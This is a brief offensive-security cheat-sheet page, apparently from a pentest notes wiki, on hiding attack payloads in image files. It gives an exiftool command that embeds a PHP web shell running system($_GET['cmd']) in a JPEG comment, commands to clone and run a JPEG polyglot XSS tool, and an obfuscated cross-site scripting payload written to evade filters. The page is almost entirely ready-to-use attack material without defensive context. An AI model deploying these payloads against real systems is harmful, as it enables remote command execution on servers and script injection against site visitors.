Embed XSS payload into image file

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' evil.jpeg

git clone https://github.com/simplylu/jpeg_polyglot_xss.git

python3 exploit.py -i test.png -o test_payload.png -pf payload

#Payload

<A href="javascrip%09t&colon;eval.apply${[jj.className+(23)]}" id=jj class=alert>Click Here

PreviousXSStrike NextWAF Bypass 2024

Last updated 10 months ago